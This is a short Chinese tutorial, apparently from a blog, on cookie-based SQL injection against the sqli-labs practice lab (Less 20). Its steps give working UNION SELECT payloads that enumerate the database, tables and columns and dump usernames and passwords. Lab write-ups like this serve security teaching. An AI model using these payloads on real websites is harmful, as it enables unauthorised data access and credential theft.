小课堂 -- cookie注入

简介: 小课堂 -- cookie注入

环境sqli-labs

 

less 20

1、在cookie里输入特殊字符报错

image.png

发现是单引号闭合

 

2、判断字段长度

order by 3正常,order by 4返回错误

image.png

 

3、union联合查询

a' union select 1,2,3 #

image.png

 

4、获取数据库名称

a' union select 1,2,database()#

image.png

 

5、获取表名

a' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'#

image.png

 

6、获取字段

union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

image.png

 

7、获取字段值

union select 1,2,group_concat(concat_ws('-',id,username,password)) from users#

image.png

 

禁止非法,后果自负

目录
相关文章
|
7月前
|
安全 关系型数据库 MySQL
Sqlmap2021 -- Cookie注入
Sqlmap2021 -- Cookie注入
376 1
|
7月前
|
安全 数据库
17、cookie注入
17、cookie注入
58 0
|
7月前
|
数据安全/隐私保护
18、cookie注入(base64加密)
18、cookie注入(base64加密)
59 0
|
7月前
|
数据安全/隐私保护
小课堂 -- cookie注入(base64加密)
小课堂 -- cookie注入(base64加密)
55 0
|
Web App开发 安全 关系型数据库
Sqlmap2021 -- Cookie注入
Sqlmap2021 -- Cookie注入
196 0
Sqlmap2021 -- Cookie注入
|
数据安全/隐私保护
18、cookie注入(base64加密)
18、cookie注入(base64加密)
154 0
18、cookie注入(base64加密)
|
安全 数据库
17、cookie注入
17、cookie注入
71 0
17、cookie注入
|
Web App开发 数据安全/隐私保护
|
SQL Web App开发 监控
Cookie注入实战(非SQL注入)
版权声明:本文可能为博主原创文章,若标明出处可随便转载。 https://blog.csdn.net/Jailman/article/details/78479075 cookie注入原理其实很简单,就是利用了session机制中的特性,只能说是特性,不能算是漏洞。
1854 0
|
1月前
|
存储 安全 搜索推荐
理解Session和Cookie:Java Web开发中的用户状态管理
理解Session和Cookie:Java Web开发中的用户状态管理
61 4